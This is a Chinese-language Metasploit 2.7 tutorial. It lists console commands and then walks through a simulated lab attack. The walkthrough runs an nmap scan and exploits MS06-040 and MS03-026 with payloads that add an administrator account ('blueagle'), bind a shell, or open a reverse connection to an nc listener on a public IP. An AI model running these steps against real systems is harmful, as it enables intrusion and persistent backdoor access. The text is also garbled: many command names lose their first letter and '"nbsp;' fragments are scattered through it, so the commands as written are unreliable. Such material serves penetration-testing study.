Metasploit Framework:黑掉整個(gè)星球
Metasploit Framework是一個(gè)編寫,測試和使用exploit代碼的完善環(huán)境。這個(gè)環(huán)境為滲透測試,shellcode編寫和漏洞研究提供了一個(gè)可靠的平臺(tái),這個(gè)框架主要是由面向?qū)ο蟮腜erl編程語言編寫的,并帶有由C語言,匯編程序和Python編寫的可選組件。
Metasploit Framework 作為一個(gè)緩沖區(qū)溢出測試使用的輔助工具,也可以說是一個(gè)漏洞利用和測試平臺(tái)。它集成了各平臺(tái)上常見的溢出漏洞和流行的shellcode,并且不斷更新,使得緩沖區(qū)溢出測試變得方便和簡單。
使用Metasploit安全測試工具在滲透測試中可以做很多事情,你可以保存你的日志、甚至定義每個(gè)有效負(fù)載在運(yùn)行完成之后是如何將其自身清除的。值得一提的是這個(gè)強(qiáng)大的工具是免費(fèi)的,它的開發(fā)團(tuán)隊(duì)由兩個(gè)全職成員和少數(shù)兼職的投稿者組成,Metasploit Framework由最初的1.0版發(fā)展到現(xiàn)在的3.0版的漏洞自動(dòng)化探測,成績驕人,精神可嘉!
下載鏈接:http://down.51cto.com/data/146158
>>去網(wǎng)絡(luò)安全工具百寶箱看看其它安全工具
使用方法
本文以Metasploit Framework 2.7為例,簡述它在命令模式下的使用方法。
1).安裝完成后運(yùn)行MSFUpdate進(jìn)行自動(dòng)更新,如無更新將提示退出程序。如有更新,當(dāng)出現(xiàn)Preserve modifications(yes or no)?時(shí)輸入"es"?行更新.
2).可以通過MSFConsole直接進(jìn)入,也可以在Cygshell下輸入msfconsole進(jìn)入框架命令模式下.
3).使用命令"elp"
可以看到里面有如下的命令:
"?"nbsp; :獲取幫助。
"d"nbsp; :更換當(dāng)前的工作目錄。
"xit"nbsp; :退出。
"elp"nbsp; :獲取幫助。
"nfo"nbsp; :顯示當(dāng)前程序的相關(guān)信息。
"uit"nbsp; :退出程序。
"eload"nbsp; :再載入Exploit和payloads。
"ave"nbsp; :保存當(dāng)前設(shè)置
"etg"nbsp; :設(shè)置一個(gè)全局環(huán)境變量。
"nsetg"nbsp; :移除全局環(huán)境變量。
"how"nbsp; :顯示可用的Exploit和payloads。
"se"nbsp; :使用一個(gè)Exploit。
"ersion"nbsp;:顯示程序的版本。
例如使用ms06040這個(gè)漏洞,步驟如下(不唯一):
↓ show exploits //顯示可用的exploit,以BSD開頭的是針對BSD系統(tǒng)的ShellCode,以Linx開頭的是針對Linux系統(tǒng)的ShellCode,以CMD和WIN開頭的是針對Windows系統(tǒng)。
‖ info netapi_ms06_040 //查看這個(gè)exploit的相關(guān)信息
↓ use netapi_ms06_040 //使用這個(gè)exploit
‖ show options //顯示這個(gè)漏洞利用的參數(shù)
↓ set RHOST 192.168.1.11 //設(shè)置遠(yuǎn)程主機(jī)地址這個(gè)參數(shù)
show targets //顯示exploit支持的操作系統(tǒng)類型
set TARGET 0 //設(shè)置目標(biāo)為0所代表的那個(gè)操作系統(tǒng)類型
show payloads //顯示與正在使用的漏洞利用兼容的有效負(fù)載,說白了Payload就是我們平時(shí)說的ShellCode,不同的系統(tǒng)對不同的ShellCode要求是不一樣。
set PAYLOAD win32_exec //設(shè)置有效載荷為執(zhí)行特定命令
show options //顯示相關(guān)參數(shù)
set CMD "et user hello world /add"nbsp; //設(shè)置要執(zhí)行的命令為添加一個(gè)帳號(hào)
set //檢查環(huán)境設(shè)置
check //檢查目標(biāo)是否存在相關(guān)漏洞
exploit //檢查無誤后即可進(jìn)行溢出了
4).web模式下使用方法
運(yùn)行Msfweb.bat,在IE地址欄中輸入http://127.0.0.1:55555即可看到操作界面。
單擊“select payload”選項(xiàng)進(jìn)入Payload選擇界面, 選擇需要的Payload后就進(jìn)入基本信息的設(shè)定界面,這里的設(shè)置和前面介紹的基本一致,等都設(shè)定好后,點(diǎn)
Vulnerability Check檢查目標(biāo)系統(tǒng)是否存在相應(yīng)的漏洞,點(diǎn)Launch Exploit進(jìn)行溢出。
展望
最新的Metasploit 3.0版本使用的是Ruby編程語言(RUBY以很少的代碼實(shí)現(xiàn)很多功能而著稱),這說明RUBY已經(jīng)逐漸被黑客社區(qū)所認(rèn)可,是一個(gè)值得注意的新動(dòng)向,雖然它和
NESSUS比起來可能是小巫見大巫,但也有自己獨(dú)到的地方,它的功能強(qiáng)大并且容易使用,對于我們?nèi)粘5臐B透來說是一款非常實(shí)用的工具。當(dāng)然,你完全可以自己向這個(gè)工具中添加任何你認(rèn)為對你有用的溢出工具包。
Metasploit 3.0主要的目標(biāo)如下:
Improve automation of exploitation through scripting
Simplify the process of writing an exploit
Increase code re-use between exploits
Improve and generically integrate evasion techniques
Support automated network discovery and event correlation through recon modules
Continue to provide a friendly outlet for cutting edge exploitation technology
Metasploit的適應(yīng)性和平臺(tái)多功能性都十分強(qiáng)大,加之功能強(qiáng)大,使用簡單等特性將使Metasploit成為業(yè)界流行的經(jīng)典工具。
|=--------------------------=[ Metasploit 2.7的模擬攻擊 ]=--------------------------=|
本地主機(jī):192.168.1.10
目標(biāo)主機(jī):192.168.1.11
1.開虛擬機(jī),用nmap收集目標(biāo)主機(jī)相關(guān)信息
要裝Winpcap后才能使用nmap
winpcap(windows packet capture)是windows平臺(tái)下一個(gè)免費(fèi),公共的網(wǎng)絡(luò)訪問系統(tǒng)。Winpcap可以為為win32應(yīng)用程序提供訪問網(wǎng)絡(luò)底層的能力。
nmap -A 192.168.1.11 -oN C:\1.txt
2.目標(biāo)主機(jī)開啟了msrpc服務(wù)
對應(yīng)的exploit: msrpc_dcom_ms03_026
1).payload設(shè)置為win32_reverse時(shí),為逆向連接。
set LHOST 192.168.1.10
思路:假如不是在一網(wǎng)段,可設(shè)置LHOST為一公網(wǎng)IP,然后在那臺(tái)主機(jī)上用nc監(jiān)聽特定的端口。
3.端口139,445開放,可利用ms06_040這個(gè)漏洞
不清楚目標(biāo)操作系統(tǒng)時(shí)選擇自動(dòng)
1).payload設(shè)置為win32_adduser
- set USER blueagle
- set PASS blueagle
2).payload設(shè)置為win32_bind
Windows Bind shell ,對windows shell的綁定
3).payload設(shè)置為win32_exec
- set CMD "et user blueagle blueagle /add"
- set CMD "et localgroup administrators blueagle /add"